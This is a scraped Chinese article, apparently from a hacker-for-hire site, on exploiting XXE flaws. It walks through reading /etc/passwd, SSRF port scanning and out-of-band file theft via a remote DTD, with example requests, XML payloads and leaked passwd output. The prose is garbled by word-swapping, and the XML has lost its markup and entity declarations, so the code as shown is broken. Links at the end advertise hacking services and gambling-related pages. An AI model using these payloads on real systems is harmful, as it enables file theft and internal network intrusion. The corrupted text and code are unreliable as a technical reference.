XXE缝隙使用技巧:从XML到长途代码履行

访客6年前关于黑客接单986


你的Web运用是否存在XXE缝隙?
假如你的运用是经过用户上传处理XML文件或POST恳求(例如将SAML用于单点登录服务乃至是RSS)的,那么你很有或许会遭到XXE的进犯。XXE是一种十分常见的缝隙类型,咱们简直每天都会碰到它。在上一年的几回web运用浸透中,咱们就成功的运用了好几回。
什么是XXE
简略来说,XXE便是XML外部实体注入。当答应引证外部实体时,经过结构歹意内容,就或许导致恣意文件读取、体系指令履行、内网端口勘探、进犯内网网站等损害。
例如,假如你当时运用的程序为PHP,则能够将libxml_disable_entity_loader设置为TRUE来禁用外部实体,然后起到防护的意图。
根本运用
一般进犯者会将payload注入XML文件中,一旦文件被履行,将会读取服务器上的本地文件,并对内网建议拜访扫描内部 *** 端口。换而言之,XXE是一种从本地抵达各种服务的办法。此外,在必定程度上这也或许协助进犯者绕过防火墙规矩过滤或身份验证检查。
以下是一个简略的XML代码POST恳求示例:
POST /vulnerable HTTP/1.1
Host: www.test.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: https://test.com/test.html
Content-Type: application/xml
Content-Length: 294
Cookie: mycookie=cookies;
Connection: close
Upgrade-Insecure-Requests: 1
catalog>
   core id="test101">
      author>John, Doeauthor>
      title>I love XMLtitle>
      category>Computerscategory>
      price>9.99price>
      date>2019-10-01date>
      description>XML is the best!description>
   core>
catalog>
之后,上述代码将交由服务器的XML处理器解析。代码被解说并回来:{“Request Successful”: “Added!”}
现在,当进犯者企图乱用XML代码解析时会发作什么?让咱们修改代码并包括咱们的歹意payload:
]>
catalog>
   core id="test101">
      author>John, Doeauthor>
      title>I love XMLtitle>
      category>Computerscategory>
      price>9.99price>
      date>2019-10-01date>
      description>&xxe;description>
   core>
catalog>
代码被解说并回来:
{"error": "no results for description root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/ *** in:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync...
Blind OOB XXE
如上例所示,服务器将/etc/passwd文件的内容作为呼应回来给咱们的XXE。但是在某些状况下,即使服务器或许存在XXE,也不会向进犯者的浏览器或署理回来任何呼应。遇到这种状况,咱们能够运用Blind XXE缝隙来构建一条外带数据(OOB)通道来读取数据。尽管咱们无法直接检查文件内容,但咱们依然能够运用易受进犯的服务器作为署理,在外部 *** 上履行扫描以及代码。
场景1 – 端口扫描
在之一个示例中,咱们经过URI将恳求指向了/etc/passwd文件,并终究成功的为咱们回来了文件中的内容。除此之外,咱们也能够运用http URI并强制服务器向咱们指定的端点和端口发送GET恳求,将XXE转换为SSRF(服务器端恳求假造)。
以下代码将测验与端口8080通讯,依据呼应时刻/长度,进犯者将能够判别该端口是否已被敞开。
]>
catalog>
   core id="test101">
      author>John, Doeauthor>
      title>I love XMLtitle>
      category>Computerscategory>
      price>9.99price>
      date>2019-10-01date>
      description>&xxe;description>
   core>
catalog>
场景2 – 经过DTD盗取文件
外部文档类型界说(DTD)文件可被用于触发OOB XXE。进犯者将.dtd文件保管在VPS上,使长途易受进犯的服务器获取该文件并履行其间的歹意指令。
以下恳求将被发送到运用程序以演示和测验该办法:
catalog>
   core id="test101">
      author>John, Doeauthor>
      title>I love XMLtitle>
      category>Computerscategory>
      price>9.99price>
      date>2019-10-01date>
      description>&xxe;description>
   core>
catalog>
上述代码一旦由易受进犯的服务器处理,就会向咱们的长途服务器发送恳求,查找包括咱们的payload的DTD文件:
"file:///etc/passwd">

[1] [2]  黑客接单网

相关文章

林勇红客

这样,ArrayBuffer根本上就类似于原始内存,你会用C言语模仿一种直接的内存拜访, 什么是 AFLSmarthttps://mp.weixin.qq.com/s?__biz=MzI2MDc2MD...

网上怎么赌博输钱报警

微软发布远程桌面服务远程代码执行漏洞CVE-2019-0708的安全通告及相应补丁,并特别针对此漏洞发布了专门的说明,提示这是一个可能导致蠕虫泛滥的严重漏洞Windows 2003Windows XP...

佛山黑客公司有接单的_黑客吧

smart deletion: default:无2018年8月14日,微软发布了针对该缺点的体系补丁,对应的缝隙编号为CVE-2018-8414。 360要挟情报中心随后发布了运用该进犯技能的相关陈...

网络赌博被骗报案了可以撤诉吗

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708 Windows Server 2008...

Google.org点击劫持DOM XSS-黑客接单平台

谷歌有一个项目信任许多人或许都没听过,那便是谷歌危机地图(Google Crisis Map)。 该项目旨在协助人们能够快速的查找和运用一些要害的应急信息(来历)。 尽管它现在仍在运用,但它好像运用的...

怎么回事?是不是发太多了?我是有在群里赌博,怎

图1:进犯者的主页运用(CVE-2017-11774)3.运用暗码办理器来安排暗码,生成安全随机的暗码,主动登陆网站来维护数字财物和个人身份。 支撑无怎么回事?是不是发太多了?我是有在群里赌博,怎,...